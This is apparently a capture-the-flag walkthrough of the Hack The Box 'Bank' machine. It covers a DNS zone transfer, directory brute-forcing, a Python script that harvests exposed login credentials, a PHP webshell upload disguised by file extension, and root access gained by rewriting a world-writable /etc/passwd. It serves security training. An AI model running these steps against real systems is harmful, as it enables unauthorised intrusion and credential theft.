# HTB - Bank ![Bank](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qDMWy0dZ4taDSZ0z-%2F-M2qDUtzyGKLRLYHpE1N%2Fimage.png?alt=media\&token=f5d70c97-2a81-4717-8e9b-4a67e166d223) ## Getting Root ### Tools Used: **`dig, dirsearch.py, python`** ## Nmap ```bash # Nmap 7.80 scan initiated Thu Mar 19 18:56:57 2020 as: nmap -sC -sV -p 22,53,80 -oA Bank 10.10.10.29 Nmap scan report for 10.10.10.29 Host is up (0.040s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Mar 19 18:57:12 2020 -- 1 IP address (1 host up) scanned in 15.09 seconds ``` ## Enumeration ### DNS Enumerating DNS shows potential vhost to be used in our http enumeration ```bash # Zone Tranfer dig axfr bank.htb @10.10.10.29 ; <<>> DiG 9.11.16-2-Debian <<>> axfr bank.htb @10.10.10.29 ;; global options: +cmd bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800 bank.htb. 604800 IN NS ns.bank.htb. bank.htb. 604800 IN A 10.10.10.29 ns.bank.htb. 604800 IN A 10.10.10.29 www.bank.htb. 604800 IN CNAME bank.htb. bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800 ;; Query time: 54 msec ;; SERVER: 10.10.10.29#53(10.10.10.29) ;; WHEN: Thu Mar 19 19:37:51 EDT 2020 ;; XFR size: 6 records (messages 1, bytes 171) ``` ### HTTP ```bash # python3 dirsearch.py -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 220521 Error Log: /opt/dirsearch/logs/errors-20-03-19_20-31-36.log Target: http://bank.htb [20:31:36] Starting: [20:31:36] 302 - 7KB - / -> login.php [20:31:37] 301 - 305B - /uploads -> http://bank.htb/uploads/ [20:31:38] 301 - 304B - /assets -> http://bank.htb/assets/ [20:31:50] 301 - 301B - /inc -> http://bank.htb/inc/ [20:42:17] 403 - 288B - /server-status [20:53:57] 301 - 314B - /balance-transfer -> http://bank.htb/balance-transfer/ Task Completed ``` #### Checking out /balance-transfer/ ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qHhOz6tLcGgKecyyp%2Fimage.png?alt=media\&token=ead4e06b-55de-4c49-87b4-28e3866c3015) Checking any of the files show login accounts encrypted. See example below: ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qI0w4piEPQPFe5bLv%2Fimage.png?alt=media\&token=c9c4a358-2c7d-4b45-a107-95a6402e1f7d) Custom python script to get all the usernames and password ```python #!/usr/bin/env python3 # Created By: squid22 # HTB Bank import requests import re import time url = "http://bank.htb/balance-transfer/" r = requests.get(url) data = r.text #print(data) f = re.findall(r'href="(\w+\.acc)"', data) for files in f: r = requests.get(url+files) stuff = r.text user = re.search(r'Email: (.*)', stuff) username = user.group(1) passwd = re.search(r'Password: (.*)', stuff) password = passwd.group(1) print(f"File Name: {files}") print(f"Username: {username}") print(f"Password: {password}") print("========================================") ``` Running the script, shows a file that somehow was not encrypted\ **File Name**: **`68576f20e9732f1b2edc4df5b8533230.acc`** ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qDmLbXVZLS4wcyRfH%2F-M2qFoKhDrJe5VdFyjU_%2Fimage.png?alt=media\&token=ff8616a0-0eea-4d06-8211-7026c0a37bb2) Let's login to **`http://bank.htb/login.php`** using the credentials found. ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qJ4ETmxsfUV7Zf38v%2Fimage.png?alt=media\&token=5cd6dab1-7088-466f-bd01-d0f19832e5a4) Success! ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2psKOyWkJ4_7S3nSMO%2F-M2pvX1jApQPfknUdohH%2Fimage.png?alt=media\&token=2b0cf58a-0068-41c8-a629-69a9f9ade171) ## Getting shell From the **Support** link, we can upload files but it seems like we can only upload images. Viewing the source of the page, an interesting debug message states that using **`*.htb`** extension executes **`*.php`** files. ```bash # mv webshell.php webshell.htb ``` ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qKYmFjnrrVnV_NjBn%2Fimage.png?alt=media\&token=47d947f7-3cb7-45e3-9aa7-1aa9abe614ff) ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qKj1fD3hrOuZpRTF1%2Fimage.png?alt=media\&token=f525279c-2aae-4d63-a1bb-76024ebe1c68) ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2psKOyWkJ4_7S3nSMO%2F-M2pvhXiU_C9F87mq-ki%2Fimage.png?alt=media\&token=be588d3f-e91f-40b9-b28e-24e2ff4c7f6b) ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qGxMH-kAgaNd3qNi5%2F-M2qM6URcBp1z37ieMUw%2Fimage.png?alt=media\&token=f9bf9039-b35d-452e-8d40-62b275b1e0af) ## Privilege Escalation ### Method 1 - /etc/passwd During enumeration, the /etc/passwd showed as world writable ```bash www-data@bank:/var/www/bank/uploads$ stat /etc/passwd File: '/etc/passwd' Size: 1349 Blocks: 8 IO Block: 4096 regular file Device: 801h/2049d Inode: 661044 Links: 1 Access: (0666/-rw-rw-rw-) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2020-03-20 06:03:09.092145868 +0200 Modify: 2020-03-20 06:03:05.884145943 +0200 Change: 2020-03-20 06:03:05.884145943 +0200 Birth: - ``` Generate a password using openssl: **pass123** ```bash # openssl passwd --help Usage: passwd [options] [passwords] where options are -crypt standard Unix password algorithm (default) -1 MD5-based password algorithm -apr1 MD5-based password algorithm, Apache variant -salt string use provided salt -in file read passwords from file -stdin read passwords from stdin -noverify never verify when reading password from terminal -quiet no warnings -table format output as table -reverse switch table columns ``` ```bash # openssl passwd -1 pass123 $1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31 ``` Edit the **`/etc/passwd`** file with the generated password. ```bash # vim /etc/passwd root:$1$rptdxUK7$QM4amjM8hyLaeSmEIr.U31:0:0:root:/root:/bin/bash ``` Login as root ```bash www-data@bank:/run/shm$ su root Password: root@bank:/run/shm# root@bank:/run/shm# id uid=0(root) gid=0(root) groups=0(root) root@bank:/run/shm# root@bank:/run/shm# root@bank:/run/shm# ifconfig eth0 Link encap:Ethernet HWaddr 00:50:56:b9:f4:a0 inet addr:10.10.10.29 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:feb9:f4a0/64 Scope:Link inet6 addr: dead:beef::250:56ff:feb9:f4a0/64 Scope:Global UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1532663 errors:33 dropped:156 overruns:0 frame:0 TX packets:1522107 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:287906340 (287.9 MB) TX bytes:713942880 (713.9 MB) Interrupt:19 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:3393 errors:0 dropped:0 overruns:0 frame:0 TX packets:3393 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:348982 (348.9 KB) TX bytes:348982 (348.9 KB) ``` ### Method 2 - SUID executable ```bash www-data@bank:/var/www/bank/uploads$ find / -perm -4000 -type f -ls 2>/dev/null 921605 112 -rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency 397109 8 -rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device 655904 484 -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign 395220 328 -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 921007 12 -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1 403773 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at 397102 36 -rwsr-xr-x 1 root root 35916 May 17 2017 /usr/bin/chsh 397137 48 -rwsr-xr-x 1 root root 45420 May 17 2017 /usr/bin/passwd 397136 44 -rwsr-xr-x 1 root root 44620 May 17 2017 /usr/bin/chfn 404048 20 -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec 397130 32 -rwsr-xr-x 1 root root 30984 May 17 2017 /usr/bin/newgrp 403576 20 -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils 397103 68 -rwsr-xr-x 1 root root 66284 May 17 2017 /usr/bin/gpasswd 393513 156 -rwsr-xr-x 1 root root 156708 May 29 2017 /usr/bin/sudo 403601 72 -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr 397540 20 -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd 403655 316 -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd 393288 40 -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping 393289 44 -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6 397131 36 -rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su 403434 32 -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount 393504 88 -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount 396269 68 -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount ``` ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M2qAmPqYqlKpkrfzdQx%2F-M2qDKhZgHyAUMPvvmUp%2Fimage.png?alt=media\&token=00418c6d-c17a-4284-90f1-c8c1053fb318)